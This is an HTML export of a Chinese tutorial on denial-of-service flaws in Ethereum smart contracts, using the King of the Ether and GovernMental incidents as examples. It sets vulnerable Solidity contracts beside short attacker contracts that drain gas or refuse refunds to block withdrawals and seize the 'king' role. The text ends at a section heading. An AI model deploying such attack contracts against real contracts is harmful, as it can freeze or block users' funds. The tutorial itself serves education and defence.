<!DOCTYPE html><html><head>
      <title>&#x62D2;&#x7EDD;&#x670D;&#x52A1;&#x6F0F;&#x6D1E;</title>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      
      <link rel="stylesheet" href="file:///c:\Users\&#x5C0F;&#x6829;\.vscode\extensions\shd101wyy.markdown-preview-enhanced-0.6.3\node_modules\@shd101wyy\mume\dependencies\katex\katex.min.css">
      
      
      
      
      
      
      
      
      
      <style>
      /**
 * prism.js Github theme based on GitHub's theme.
 * @author Sam Clarke
 */
code[class*="language-"],
pre[class*="language-"] {
  color: #333;
  background: none;
  font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;
  text-align: left;
  white-space: pre;
  word-spacing: normal;
  word-break: normal;
  word-wrap: normal;
  line-height: 1.4;

  -moz-tab-size: 8;
  -o-tab-size: 8;
  tab-size: 8;

  -webkit-hyphens: none;
  -moz-hyphens: none;
  -ms-hyphens: none;
  hyphens: none;
}

/* Code blocks */
pre[class*="language-"] {
  padding: .8em;
  overflow: auto;
  /* border: 1px solid #ddd; */
  border-radius: 3px;
  /* background: #fff; */
  background: #f5f5f5;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
  padding: .1em;
  border-radius: .3em;
  white-space: normal;
  background: #f5f5f5;
}

.token.comment,
.token.blockquote {
  color: #969896;
}

.token.cdata {
  color: #183691;
}

.token.doctype,
.token.punctuation,
.token.variable,
.token.macro.property {
  color: #333;
}

.token.operator,
.token.important,
.token.keyword,
.token.rule,
.token.builtin {
  color: #a71d5d;
}

.token.string,
.token.url,
.token.regex,
.token.attr-value {
  color: #183691;
}

.token.property,
.token.number,
.token.boolean,
.token.entity,
.token.atrule,
.token.constant,
.token.symbol,
.token.command,
.token.code {
  color: #0086b3;
}

.token.tag,
.token.selector,
.token.prolog {
  color: #63a35c;
}

.token.function,
.token.namespace,
.token.pseudo-element,
.token.class,
.token.class-name,
.token.pseudo-class,
.token.id,
.token.url-reference .token.variable,
.token.attr-name {
  color: #795da3;
}

.token.entity {
  cursor: help;
}

.token.title,
.token.title .token.punctuation {
  font-weight: bold;
  color: #1d3e81;
}

.token.list {
  color: #ed6a43;
}

.token.inserted {
  background-color: #eaffea;
  color: #55a532;
}

.token.deleted {
  background-color: #ffecec;
  color: #bd2c00;
}

.token.bold {
  font-weight: bold;
}

.token.italic {
  font-style: italic;
}


/* JSON */
.language-json .token.property {
  color: #183691;
}

.language-markup .token.tag .token.punctuation {
  color: #333;
}

/* CSS */
code.language-css,
.language-css .token.function {
  color: #0086b3;
}

/* YAML */
.language-yaml .token.atrule {
  color: #63a35c;
}

code.language-yaml {
  color: #183691;
}

/* Ruby */
.language-ruby .token.function {
  color: #333;
}

/* Markdown */
.language-markdown .token.url {
  color: #795da3;
}

/* Makefile */
.language-makefile .token.symbol {
  color: #795da3;
}

.language-makefile .token.variable {
  color: #183691;
}

.language-makefile .token.builtin {
  color: #0086b3;
}

/* Bash */
.language-bash .token.keyword {
  color: #0086b3;
}

/* highlight */
pre[data-line] {
  position: relative;
  padding: 1em 0 1em 3em;
}
pre[data-line] .line-highlight-wrapper {
  position: absolute;
  top: 0;
  left: 0;
  background-color: transparent;
  display: block;
  width: 100%;
}

pre[data-line] .line-highlight {
  position: absolute;
  left: 0;
  right: 0;
  padding: inherit 0;
  margin-top: 1em;
  background: hsla(24, 20%, 50%,.08);
  background: linear-gradient(to right, hsla(24, 20%, 50%,.1) 70%, hsla(24, 20%, 50%,0));
  pointer-events: none;
  line-height: inherit;
  white-space: pre;
}

pre[data-line] .line-highlight:before, 
pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-start);
  position: absolute;
  top: .4em;
  left: .6em;
  min-width: 1em;
  padding: 0 .5em;
  background-color: hsla(24, 20%, 50%,.4);
  color: hsl(24, 20%, 95%);
  font: bold 65%/1.5 sans-serif;
  text-align: center;
  vertical-align: .3em;
  border-radius: 999px;
  text-shadow: none;
  box-shadow: 0 1px white;
}

pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-end);
  top: auto;
  bottom: .4em;
}html body{font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,freesans,sans-serif;font-size:16px;line-height:1.6;color:#333;background-color:#fff;overflow:initial;box-sizing:border-box;word-wrap:break-word}html body>:first-child{margin-top:0}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{line-height:1.2;margin-top:1em;margin-bottom:16px;color:#000}html body h1{font-size:2.25em;font-weight:300;padding-bottom:.3em}html body h2{font-size:1.75em;font-weight:400;padding-bottom:.3em}html body h3{font-size:1.5em;font-weight:500}html body h4{font-size:1.25em;font-weight:600}html body h5{font-size:1.1em;font-weight:600}html body h6{font-size:1em;font-weight:600}html body h1,html body h2,html body h3,html body h4,html body h5{font-weight:600}html body h5{font-size:1em}html body h6{color:#5c5c5c}html body strong{color:#000}html body del{color:#5c5c5c}html body a:not([href]){color:inherit;text-decoration:none}html body a{color:#08c;text-decoration:none}html body a:hover{color:#00a3f5;text-decoration:none}html body img{max-width:100%}html body>p{margin-top:0;margin-bottom:16px;word-wrap:break-word}html body>ul,html body>ol{margin-bottom:16px}html body ul,html body ol{padding-left:2em}html body ul.no-list,html body ol.no-list{padding:0;list-style-type:none}html body ul ul,html body ul ol,html body ol ol,html body ol ul{margin-top:0;margin-bottom:0}html body li{margin-bottom:0}html body li.task-list-item{list-style:none}html body li>p{margin-top:0;margin-bottom:0}html body .task-list-item-checkbox{margin:0 .2em .25em -1.8em;vertical-align:middle}html body .task-list-item-checkbox:hover{cursor:pointer}html body blockquote{margin:16px 0;font-size:inherit;padding:0 15px;color:#5c5c5c;background-color:#f0f0f0;border-left:4px solid #d6d6d6}html body blockquote>:first-child{margin-top:0}html body blockquote>:last-child{margin-bottom:0}html body hr{height:4px;margin:32px 0;background-color:#d6d6d6;border:0 none}html body table{margin:10px 0 15px 0;border-collapse:collapse;border-spacing:0;display:block;width:100%;overflow:auto;word-break:normal;word-break:keep-all}html body table th{font-weight:bold;color:#000}html body table td,html body table th{border:1px solid #d6d6d6;padding:6px 13px}html body dl{padding:0}html body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:bold}html body dl dd{padding:0 16px;margin-bottom:16px}html body code{font-family:Menlo,Monaco,Consolas,'Courier New',monospace;font-size:.85em !important;color:#000;background-color:#f0f0f0;border-radius:3px;padding:.2em 0}html body code::before,html body code::after{letter-spacing:-0.2em;content:"\00a0"}html body pre>code{padding:0;margin:0;font-size:.85em !important;word-break:normal;white-space:pre;background:transparent;border:0}html body .highlight{margin-bottom:16px}html body .highlight pre,html body pre{padding:1em;overflow:auto;font-size:.85em !important;line-height:1.45;border:#d6d6d6;border-radius:3px}html body .highlight pre{margin-bottom:0;word-break:normal}html body pre code,html body pre tt{display:inline;max-width:initial;padding:0;margin:0;overflow:initial;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}html body pre code:before,html body pre tt:before,html body pre code:after,html body pre tt:after{content:normal}html body p,html body blockquote,html body ul,html body ol,html body dl,html body pre{margin-top:0;margin-bottom:16px}html body kbd{color:#000;border:1px solid #d6d6d6;border-bottom:2px solid #c7c7c7;padding:2px 4px;background-color:#f0f0f0;border-radius:3px}@media print{html body{background-color:#fff}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{color:#000;page-break-after:avoid}html body blockquote{color:#5c5c5c}html body pre{page-break-inside:avoid}html body table{display:table}html body img{display:block;max-width:100%;max-height:100%}html body pre,html body code{word-wrap:break-word;white-space:pre}}.markdown-preview{width:100%;height:100%;box-sizing:border-box}.markdown-preview .pagebreak,.markdown-preview .newpage{page-break-before:always}.markdown-preview pre.line-numbers{position:relative;padding-left:3.8em;counter-reset:linenumber}.markdown-preview pre.line-numbers>code{position:relative}.markdown-preview pre.line-numbers .line-numbers-rows{position:absolute;pointer-events:none;top:1em;font-size:100%;left:0;width:3em;letter-spacing:-1px;border-right:1px solid #999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.markdown-preview pre.line-numbers .line-numbers-rows>span{pointer-events:none;display:block;counter-increment:linenumber}.markdown-preview pre.line-numbers .line-numbers-rows>span:before{content:counter(linenumber);color:#999;display:block;padding-right:.8em;text-align:right}.markdown-preview .mathjax-exps .MathJax_Display{text-align:center !important}.markdown-preview:not([for="preview"]) .code-chunk .btn-group{display:none}.markdown-preview:not([for="preview"]) .code-chunk .status{display:none}.markdown-preview:not([for="preview"]) .code-chunk .output-div{margin-bottom:16px}.scrollbar-style::-webkit-scrollbar{width:8px}.scrollbar-style::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}.scrollbar-style::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode]){position:relative;width:100%;height:100%;top:0;left:0;margin:0;padding:0;overflow:auto}html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{position:relative;top:0}@media screen and (min-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em calc(50% - 457px + 2em)}}@media screen and (max-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{font-size:14px !important;padding:1em}}@media print{html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{display:none}}html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{position:fixed;bottom:8px;left:8px;font-size:28px;cursor:pointer;color:inherit;z-index:99;width:32px;text-align:center;opacity:.4}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] #sidebar-toc-btn{opacity:1}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc{position:fixed;top:0;left:0;width:300px;height:100%;padding:32px 0 48px 0;font-size:14px;box-shadow:0 0 4px rgba(150,150,150,0.33);box-sizing:border-box;overflow:auto;background-color:inherit}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar{width:8px}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc a{text-decoration:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{padding:0 1.6em;margin-top:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc li{margin-bottom:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{list-style-type:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{left:300px;width:calc(100% -  300px);padding:2em calc(50% - 457px -  150px);margin:0;box-sizing:border-box}@media screen and (max-width:1274px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{width:100%}}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .markdown-preview{left:50%;transform:translateX(-50%)}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .md-sidebar-toc{display:none}
/* Please visit the URL below for more information: */
/*   https://shd101wyy.github.io/markdown-preview-enhanced/#/customize-css */

      </style>
    </head>
    <body for="html-export">
      <div class="mume markdown-preview  ">
      <h1 class="mume-header" id="%E5%90%88%E7%BA%A6%E4%B8%AD%E7%9A%84%E6%8B%92%E7%BB%9D%E6%9C%8D%E5%8A%A1%E6%BC%8F%E6%B4%9E">&#x5408;&#x7EA6;&#x4E2D;&#x7684;&#x62D2;&#x7EDD;&#x670D;&#x52A1;&#x6F0F;&#x6D1E;&#xFF1A;</h1>

<hr>
<pre class="language-text">author:&#x7518;&#x8D5E;&#x6829;
</pre>
<h2 class="mume-header" id="%E4%BD%95%E4%B8%BAdos">&#x4F55;&#x4E3A;Dos</h2>

<p>DoS &#x662F;DenialOfService&#xFF0C;&#x62D2;&#x7EDD;&#x670D;&#x52A1;&#x7684;&#x7F29;&#x5199;[3]&#xFF0C;&#x4ECE;&#x5B57;&#x9762;&#x4E0A;&#x6765;&#x7406;&#x89E3;&#xFF0C;&#x5C31;&#x662F;&#x7528;&#x6237;&#x6240;&#x9700;&#x8981;&#x7684;&#x670D;&#x52A1;&#x8BF7;&#x6C42;&#x65E0;&#x6CD5;&#x88AB;&#x7CFB;&#x7EDF;&#x5904;&#x7406;&#x3002;<br>
&#x6253;&#x4E2A;&#x6BD4;&#x65B9;&#x6765;&#x5F62;&#x5BB9;DoS&#xFF0C;&#x706B;&#x8F66;&#x7AD9;&#x662F;&#x4E3A;&#x5927;&#x5BB6;&#x63D0;&#x4F9B;&#x4E58;&#x8F66;&#x670D;&#x52A1;&#x7684;&#xFF0C;&#x5982;&#x679C;&#x60F3;&#x8981;DoS&#x706B;&#x8F66;&#x7AD9;&#x7684;&#x8BDD;&#xFF0C;&#x65B9;&#x6CD5;&#x6709;&#x5F88;&#x591A;&#xFF0C;&#x53EF;&#x4EE5;&#x5360;&#x7528;&#x8FC7;&#x9053;&#x4E0D;&#x4E0A;&#x8F66;&#xFF0C;&#x5835;&#x4F4F;&#x552E;&#x7968;&#x70B9;&#x4E0D;&#x4ED8;&#x94B1;&#xFF0C;&#x963B;&#x6320;&#x5217;&#x8F66;&#x5458;&#x6216;&#x8005;&#x53F8;&#x673A;&#x4E0D;&#x8BA9;&#x5F00;&#x8F66;&#xFF0C;&#x751A;&#x81F3;&#x7528;&#x7834;&#x574F;&#x94C1;&#x8F68;&#x7B49;&#x66F4;&#x52A0;&#x6781;&#x7AEF;&#x7684;&#x624B;&#x6BB5;&#x6765;&#x5F71;&#x54CD;&#x8F66;&#x7AD9;&#x670D;&#x52A1;&#x7684;&#x6B63;&#x5E38;&#x8FD0;&#x8425;&#x3002;<br>
&#x8FC7;&#x53BB;&#x9488;&#x5BF9;&#x4E92;&#x8054;&#x7F51;&#x7684;DoS&#x6709;&#x5F88;&#x591A;&#x79CD;&#x65B9;&#x6CD5;&#xFF0C;&#x4F46;&#x57FA;&#x672C;&#x5206;&#x4E3A;&#x4E09;&#x5927;&#x7C7B;&#xFF1A;&#x5229;&#x7528;&#x8F6F;&#x4EF6;&#x5B9E;&#x73B0;&#x7684;&#x7F3A;&#x9677;&#xFF0C;&#x5229;&#x7528;&#x534F;&#x8BAE;&#x7684;&#x6F0F;&#x6D1E;&#xFF0C;&#x5229;&#x7528;&#x8D44;&#x6E90;&#x538B;&#x5236;[3]&#x3002;<br>
&#x6B64;&#x5916;&#x8FD8;&#x6709;DDoS&#xFF0C;&#x79F0;&#x4E3A;&#x5206;&#x5E03;&#x5F0F;DoS&#xFF0C;&#x5176;&#x533A;&#x522B;&#x5C31;&#x662F;&#x653B;&#x51FB;&#x8005;&#x5229;&#x7528;&#x8FDC;&#x7A0B;&#x64CD;&#x63A7;&#x7684;&#x8BA1;&#x7B97;&#x673A;&#x540C;&#x65F6;&#x5411;&#x76EE;&#x6807;&#x53D1;&#x8D77;&#x8FDB;&#x653B;&#xFF0C;&#x5728;&#x4E0A;&#x9762;&#x7684;&#x6BD4;&#x55BB;&#x4E2D;&#x53EF;&#x4EE5;&#x7406;&#x89E3;&#x4E3A;&#x96C7;&#x4F63;&#x4E86;&#x51E0;&#x767E;&#x4E2A;&#x5730;&#x75DE;&#x6D41;&#x6C13;&#x6765;&#x505A;&#x540C;&#x6837;&#x7684;&#x4E8B;&#x5F71;&#x54CD;&#x8F66;&#x7AD9;&#x7684;&#x8FD0;&#x4F5C;&#x3002;</p>
<h2 class="mume-header" id="%E4%BA%8B%E4%BB%B6%E5%9B%9E%E9%A1%BE">&#x4E8B;&#x4EF6;&#x56DE;&#x987E;</h2>

<p>2016&#x5E74;2&#x6708;6&#x65E5;&#x81F3;8&#x65E5;The King of the Ether Throne&#xFF08;&#x4EE5;&#x4E0B;&#x7B80;&#x79F0;KotET&#xFF09;&#x201C;&#x7EB7;&#x4E89;&#x65F6;&#x4EE3;&#x201D;&#xFF08;Turbulent Age&#xFF09;&#x671F;&#x95F4;&#xFF0C;&#x8BB8;&#x591A;&#x6E38;&#x620F;&#x4E2D;&#x7684;&#x9000;&#x4F4D;&#x541B;&#x738B;&#x7684;&#x8865;&#x507F;&#x548C;&#x672A;&#x63A5;&#x53D7;&#x6B3E;&#x9879;&#x65E0;&#x6CD5;&#x9000;&#x56DE;&#x7528;&#x6237;&#x73A9;&#x5BB6;&#x7684;&#x94B1;&#x5305;.<br>
&#x5177;&#x6709;&#x8BBD;&#x523A;&#x610F;&#x5473;&#x7684;&#x662F;&#x540C;&#x5E74;6&#x6708;&#xFF0C;&#x8FDE;&#x5E9E;&#x6C0F;&#x9A97;&#x5C40;GovernMental&#x7684;&#x5408;&#x7EA6;&#x4E5F;&#x906D;&#x9047;DoS&#x653B;&#x51FB;&#xFF0C;&#x5F53;&#x65F6;1100&#x4EE5;&#x592A;&#x5E01;&#x662F;&#x901A;&#x8FC7;&#x4F7F;&#x7528;250&#x4E07;gas&#x4EA4;&#x6613;&#x83B7;&#x5F97;[2]&#xFF0C;&#x8FD9;&#x7B14;&#x4EA4;&#x6613;&#x8D85;&#x51FA;&#x4E86;&#x5408;&#x7EA6;&#x80FD;&#x8D1F;&#x8377;&#x7684;gas&#x4E0A;&#x9650;&#xFF0C;&#x5E26;&#x6765;&#x4EA4;&#x6613;&#x6D3B;&#x52A8;&#x7684;&#x6682;&#x505C;&#x3002;<br><br>
&#x65E0;&#x8BBA;&#x662F;&#x84C4;&#x610F;&#x7834;&#x574F;&#x4EA4;&#x6613;&#x6B63;&#x5E38;&#x6D41;&#x7A0B;&#x8FD8;&#x662F;&#x963B;&#x585E;&#x4EA4;&#x6613;&#x901A;&#x9053;&#xFF0C;&#x90FD;&#x7528;&#x5230;&#x4E86;&#x4E00;&#x4E2A;&#x4E92;&#x8054;&#x7F51;&#x65F6;&#x4EE3;&#x5DF2;&#x7ECF;&#x76DB;&#x884C;&#x5DF2;&#x4E45;&#x7684;&#x653B;&#x51FB;&#x65B9;&#x5F0F;&#x2014;&#x2014;DoS&#xFF0C;&#x4E5F;&#x5C31;&#x662F;&#x6211;&#x4EEC;&#x6240;&#x8BF4;&#x7684;&#x62D2;&#x7EDD;&#x670D;&#x52A1;&#x653B;&#x51FB;&#x3002;<br>
&#x8FD9;&#x79CD;&#x653B;&#x51FB;&#x65B9;&#x5F0F;&#x53EF;&#x4EE5;&#x8BA9;&#x5408;&#x7EA6;&#x6267;&#x884C;&#x7684;&#x6B63;&#x5E38;&#x7684;&#x4EA4;&#x6613;&#x64CD;&#x4F5C;&#x88AB;&#x6270;&#x4E71;&#xFF0C;&#x4E2D;&#x6B62;&#xFF0C;&#x51BB;&#x7ED3;&#xFF0C;&#x66F4;&#x4E25;&#x91CD;&#x7684;&#x662F;&#x8BA9;&#x5408;&#x7EA6;&#x672C;&#x8EAB;&#x7684;&#x903B;&#x8F91;&#x65E0;&#x6CD5;&#x8FD0;&#x884C;</p>
<h2 class="mume-header" id="%E5%B7%B2%E7%9F%A5%E6%BC%8F%E6%B4%9E%E7%9A%84%E7%B1%BB%E5%9E%8B">&#x5DF2;&#x77E5;&#x6F0F;&#x6D1E;&#x7684;&#x7C7B;&#x578B;</h2>

<ol>
<li>&#x672A;&#x8BBE;&#x5B9A;gas&#x8D39;&#x7387;&#x7684;&#x5916;&#x90E8;&#x8C03;&#x7528;</li>
<li>&#x4F9D;&#x8D56;&#x5916;&#x90E8;&#x7684;&#x8C03;&#x7528;&#x8FDB;&#x5C55;</li>
<li>owner&#x9519;&#x8BEF;&#x64CD;&#x4F5C;</li>
<li>&#x6570;&#x7EC4;&#x6216;&#x6620;&#x5C04;&#x8FC7;&#x957F;</li>
<li>&#x903B;&#x8F91;&#x8BBE;&#x8BA1;&#x9519;&#x8BEF;</li>
<li>&#x7F3A;&#x5C11;&#x4F9D;&#x8D56;&#x5E93;</li>
</ol>
<h2 class="mume-header" id="%E6%9C%AA%E8%AE%BE%E5%AE%9Agas%E8%B4%B9%E7%8E%87%E7%9A%84%E5%A4%96%E9%83%A8%E8%B0%83%E7%94%A8">&#x672A;&#x8BBE;&#x5B9A;gas&#x8D39;&#x7387;&#x7684;&#x5916;&#x90E8;&#x8C03;&#x7528;</h2>

<p>&#x5728;&#x5408;&#x7EA6;&#x4E2D;&#x4F60;&#x53EF;&#x80FD;&#x60F3;&#x8981;&#x901A;&#x8FC7;call&#x8C03;&#x7528;&#x53BB;&#x6267;&#x884C;&#x67D0;&#x4E9B;&#x4E1C;&#x897F;&#x7684;&#x65F6;&#x5019;&#xFF0C;&#x56E0;&#x4E3A;&#x672A;&#x8BBE;&#x5B9A;gas&#x8D39;&#x7387;&#x5BFC;&#x81F4;&#x53EF;&#x80FD;&#x53D1;&#x751F;&#x6076;&#x610F;&#x7684;&#x8C03;&#x7528;&#x3002;</p>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.6.0;
 
import &apos;@openzeppelin/contracts/math/SafeMath.sol&apos;;
 
contract Denial {
 
    using SafeMath for uint256;
    address public partner; // withdrawal partner - pay the gas, split the withdraw
    address payable public constant owner = address(0xA9E);
    uint timeLastWithdrawn;
    mapping(address =&gt; uint) withdrawPartnerBalances; // keep track of partners balances
 
    function setWithdrawPartner(address _partner) public {
        partner = _partner;
    }
 
    // withdraw 1% to recipient and 1% to owner
    function withdraw() public {
        uint amountToSend = address(this).balance.div(100);
        // perform a call without checking return
        // The recipient can revert, the owner will still get their share
        partner.call.value(amountToSend)(&quot;&quot;);
        owner.transfer(amountToSend);
        // keep track of last withdrawal time
        timeLastWithdrawn = now;
        withdrawPartnerBalances[partner] = withdrawPartnerBalances[partner].add(amountToSend);
    }
 
    // allow deposit of funds
    fallback() external payable {}
 
    // convenience function
    function contractBalance() public view returns (uint) {
        return address(this).balance;
    }
}
</code></pre><p>&#x4ECE;&#x5408;&#x7EA6;&#x7684;&#x4EE3;&#x7801;&#x4E2D;&#x6211;&#x4EEC;&#x5F88;&#x5BB9;&#x6613;&#x53D1;&#x73B0;&#x8FD9;&#x91CC;&#x5B58;&#x5728;&#x4E00;&#x4E2A;&#x91CD;&#x5165;&#x6F0F;&#x6D1E;&#xFF0C;&#x6240;&#x4EE5;&#x53EF;&#x4EE5;&#x901A;&#x8FC7;&#x90E8;&#x7F72;&#x4E86;&#x4E00;&#x4E2A;&#x5229;&#x7528;&#x91CD;&#x5165;&#x6F0F;&#x6D1E;&#x7684;&#x5408;&#x7EA6;&#xFF0C;&#x628A;gas&#x76F4;&#x63A5;&#x6D88;&#x8017;&#x5149;&#xFF0C;&#x90A3;&#x4E48;owner &#x81EA;&#x7136;&#x6536;&#x4E0D;&#x5230;&#x94B1;&#x4E86;&#xFF0C;&#x4ECE;&#x800C;&#x9020;&#x6210;DOS&#x3002;</p>
<pre data-role="codeBlock" data-info class="language-"><code>contract Attack{
    address instance_address = instance_address_here;
    Denial target = Denial(instance_address);
 
    function hack() public {
        target.setWithdrawPartner(address(this));
        target.withdraw();
    }
 
    function () payable public {
        target.withdraw();
    } 
}
</code></pre><p>&#x6216;&#x8005;assert &#x51FD;&#x6570;&#x89E6;&#x53D1;&#x5F02;&#x5E38;&#x4E4B;&#x540E;&#x4F1A;&#x6D88;&#x8017;&#x6240;&#x6709;&#x53EF;&#x7528;&#x7684; gas&#xFF0C;&#x6D88;&#x8017;&#x4E86;&#x6240;&#x6709;&#x7684; gas &#x90A3;&#x5C31;&#x6CA1;&#x6CD5;&#x8F6C;&#x8D26;&#x4E86;</p>
<pre data-role="codeBlock" data-info class="language-"><code>contract Attack{
    address instance_address = instance_address_here;
    Denial target = Denial(instance_address);
    function hack() public {
        target.setWithdrawPartner(address(this));
        target.withdraw();
    }
    function () payable public {
        assert(0==1);
    }
}
</code></pre><ul>
<li>&#x89E3;&#x51B3;&#x65B9;&#x6848;</li>
</ul>
<blockquote>
<p>&#x4F7F;&#x7528;call&#x51FD;&#x6570;&#x65F6;&#x53EF;&#x4EE5;&#x8C03;&#x8BD5;&#x51FA;&#x6267;&#x884C;&#x64CD;&#x4F5C;&#x9700;&#x8981;&#x7684;&#x5927;&#x81F4;gas&#x8D39;&#x7387;&#xFF0C;&#x5728;call&#x51FD;&#x6570;&#x6307;&#x5B9A;&#x7A0D;&#x5927;&#x4E00;&#x4E9B;&#x8D39;&#x7387;&#xFF0C;&#x907F;&#x514D;&#x653B;&#x51FB;&#x53D1;&#x751F;&#x3002;</p>
</blockquote>
<h2 class="mume-header" id="%E4%BE%9D%E8%B5%96%E5%A4%96%E9%83%A8%E7%9A%84%E8%B0%83%E7%94%A8%E8%BF%9B%E5%B1%95">&#x4F9D;&#x8D56;&#x5916;&#x90E8;&#x7684;&#x8C03;&#x7528;&#x8FDB;&#x5C55;</h2>

<p>&#x8FD9;&#x7C7B;&#x6F0F;&#x6D1E;&#x5E38;&#x89C1;&#x4E8E;&#x7ADE;&#x62CD;&#x7684;&#x5408;&#x7EA6;&#x5F53;&#x4E2D;&#xFF0C;&#x4F60;&#x7684;&#x60F3;&#x6CD5;&#x662F;&#x5982;&#x679C;&#x6709;&#x4EBA;&#x51FA;&#x4EF7;&#x9AD8;&#x4E8E;&#x73B0;&#x9636;&#x6BB5;&#x7684;&#x4EF7;&#x683C;&#xFF0C;&#x5C31;&#x628A;&#x5F53;&#x524D;&#x7684;&#x7ADE;&#x62CD;&#x8005;&#x7684;token&#x9000;&#x8FD8;&#x7ED9;&#x4ED6;&#xFF0C;&#x518D;&#x53BB;&#x66F4;&#x65B0;&#x7ADE;&#x62CD;&#x8005;&#xFF0C;&#x6B8A;&#x4E0D;&#x77E5;transfer&#x51FD;&#x6570;&#x6267;&#x884C;&#x5931;&#x8D25;&#x540E;&#xFF0C;&#x4EA6;&#x4F1A;&#x4F7F;&#x4E0B;&#x9762;&#x7684;&#x6B65;&#x9AA4;&#x65E0;&#x6CD5;&#x6267;&#x884C;&#x3002;</p>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.6.0;
 
contract King {
 
  address payable king;
  uint public prize;
  address payable public owner;
 
  constructor() public payable {
    owner = msg.sender;  
    king = msg.sender;
    prize = msg.value;
  }
 
  fallback() external payable {
    require(msg.value &gt;= prize || msg.sender == owner);
    king.transfer(msg.value);
    king = msg.sender;
    prize = msg.value;
  }
 
  function _king() public view returns (address payable) {
    return king;
  }
}
</code></pre><p>&#x8C01;&#x53D1;&#x9001;&#x5927;&#x4E8E; king &#x7684;&#x91D1;&#x989D;&#x5C31;&#x80FD;&#x6210;&#x4E3A;&#x65B0;&#x7684; king&#xFF0C;&#x4F46;&#x662F;&#x8981;&#x5148;&#x628A;&#x4E4B;&#x524D;&#x7684;&#x56FD;&#x738B;&#x7684;&#x94B1;&#x9000;&#x56DE;&#x53BB;&#x624D;&#x80FD;&#x66F4;&#x6539; king&#x3002;&#x53EA;&#x8981;&#x6211;&#x4EEC;&#x4E00;&#x76F4;&#x4E0D;&#x63A5;&#x53D7;&#x9000;&#x56DE;&#x7684;&#x5956;&#x91D1;&#xFF0C;&#x90A3;&#x6211;&#x4EEC;&#x5C31;&#x80FD;&#x591F;&#x4E00;&#x76F4;&#x4FDD;&#x6301; king &#x7684;&#x8EAB;&#x4EFD;&#xFF0C;&#x90A3;&#x5C31;&#x628A;&#x5408;&#x7EA6;&#x7684;fallback&#x51FD;&#x6570;&#x4E0D;&#x5F04;&#x6210;payable&#x5C31;&#x80FD;&#x4E00;&#x76F4;&#x4E0D;&#x63A5;&#x53D7;&#x4E86;&#x3002;&#x5F53;&#x7136;&#x7B2C;&#x4E00;&#x6B65;&#x662F;&#x5148;&#x6210;&#x4E3A;King</p>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.4.18;
 
contract Attacker{
    constructor(address target) public payable{
        target.call.gas(1000000).value(msg.value)();
    }
}
//&#x672A;&#x5B9A;&#x4E49;fallback&#x51FD;&#x6570;&#xFF0C;&#x5C31;&#x6CA1;&#x6709;payable&#x4FEE;&#x9970;
</code></pre><ul>
<li>&#x89E3;&#x51B3;&#x65B9;&#x6848;</li>
</ul>
<h2 class="mume-header" id="owner%E9%94%99%E8%AF%AF%E6%93%8D%E4%BD%9C">owner&#x9519;&#x8BEF;&#x64CD;&#x4F5C;</h2>

